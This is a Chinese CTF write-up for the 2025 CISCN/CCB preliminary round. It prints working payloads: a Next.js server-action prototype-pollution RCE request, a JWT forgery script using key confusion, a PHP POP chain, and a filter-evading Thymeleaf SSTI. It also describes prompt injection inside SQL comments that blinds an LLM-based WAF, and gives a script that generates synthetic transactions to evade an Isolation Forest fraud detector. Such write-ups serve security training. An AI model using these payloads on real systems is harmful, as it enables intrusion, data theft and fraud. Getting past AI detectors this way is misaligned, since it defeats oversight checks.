Featured image of post 2025ciscn&ccb初赛wp
Wp

2025ciscn&ccb初赛wp

2025ciscn&ccb初赛wp

Web

Redjs

前段时间的CVE,直接拿poc打

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

POST /apps HTTP/2.0
Host: eci-2zee0kaqistouenwy4dr.cloudeci1.ichunqiu.com:3000
Next-Action: x
X-Nextjs-Request-Id: b5dce965
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
sec-fetch-mode: navigate
cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1757815655
accept-encoding: gzip, deflate, br, zstd
sec-fetch-dest: document
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
te: trailers
sec-fetch-site: none
sec-fetch-user: ?1
priority: u=0, i
accept-language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('cat /flag',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

img

Deprecated

参考网鼎杯2024,先拿rsasign2n拿到publickey

注册一个账号,拿到session,生成两次不同的session用脚本生成key

img

脚本伪造cookie

1
2
3
4
5
6
7
8

const jwt = require('jsonwebtoken');
const fs = require('fs');
const publicKey = fs.readFileSync('./e50e944eb832bf5f_65537_x509.pem','utf8');
data = {
    username: "admin",priviledge: 'File-Priviledged-User'
}
data = Object.assign(data);
console.log(jwt.sign(data, publicKey, { algorithm: 'HS256' }));

img

以admin登入了

img

存在任意文件读取,直接读flag

img

hellogate

上来一个图片肯定有东西

img

有php代码,一眼打pop链

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

<?php
class A {
    public $handle;
}

class B {
    public $worker;
}

class C {
    public $cmd = "/flag"; 
}

$c = new C();
$b = new B();
$b->worker = $c;
$a = new A();
$a->handle = $b;
echo urlencode(serialize($a));
?>

img

EzJava

一眼thymeleaf的ssti,测试payload发现T()一起会被替换,new也会被替换,想到用T和(中间加空格绕过

一通尝试拿到Runtime类,题目描述删了命令,读文件用java原生的去读

img

然后通过索引读取就行了

img

或者这个

1

template=<p th:text="${T (java.nio.file.Files).readAllLines(T (java.nio.file.Paths).get('/'.concat('f').concat('l').concat('a').concat('g').concat('_y0u_d0nt_kn0w'))).get(0)}"></p>

AI_WAF

明显是在 /search 注入,测试发现常用的关键词 select 等均被ban,waf 的评判依据是 confidence 的数值

既然是 ai waf 就可以尝试注入 prompt,直接在 query 里 sql 的注释部分后面注入 prompt 让 confidence 永远为 0 即可

img

ai安全

The Silent Heist

对抗机器学习,要绕过 Isolation Forest模型,核心策略是生成位于正常数据分布高密度区域的数据。

我们需要计算已知正常交易的统计分布(均值、协方差),然后生成一组新的数据,使其在多维空间中处于这些记录的质心附近。

我们通过读取生成数据,然后通过均值加随机噪声的方式生成

解题脚本如下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

import pandas as pd
import numpy as np
import socket
import time

def solve():
    target_host = "182.92.11.65"  
    target_port = 26678       
    input_file = 'public_ledger.csv'
    print(f"[*] 读取数据源: {input_file}...")
    df = pd.read_csv(input_file)
    # 计算均值和协方差矩阵
    means = df.mean()
    cov_matrix = df.cov()
    # 我们需要总金额 > $2,000,000,均值约为 355,所以生成 6000 条数据
    num_records = 6000
    print(f"[*] 正在生成 {num_records} 条伪造交易...")
    synthetic_data = np.random.multivariate_normal(means, cov_matrix * 0.1, num_records)
    # 转换为 DataFrame
    columns = [f'f{i}' for i in range(20)]
    new_df = pd.DataFrame(synthetic_data, columns=columns)
    # 防止重复检测:加入微小的随机噪声
    new_df += np.random.normal(0, 1e-9, new_df.shape)
    # 校验金额
    total_amount = new_df['f0'].sum()
    print(f"[+] 伪造金额总计: ${total_amount:,.2f}")
    csv_payload = new_df.to_csv(index=False)
    payload = csv_payload + "\nEOF\n"
    try:
        print(f"[*] 正在连接到 {target_host}:{target_port}...")
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((target_host, target_port))
            initial_resp = s.recv(1024).decode()
            print(f"[>] 服务器回应: {initial_resp}")
            print("[*] 正在上传交易数据流...")
            s.sendall(payload.encode())
            time.sleep(1) 
            final_resp = s.recv(4096).decode()
            print(f"\n[!] 结果反馈:\n{final_resp}")
            
    except Exception as e:
        print(f"[!] 发生错误: {e}")

if __name__ == "__main__":
    solve()
CTF
Licensed under 9u_l3
© 2025 - 2026 无敌可爱美咕噜
使用 Hugo 构建
主题 StackJimmy 设计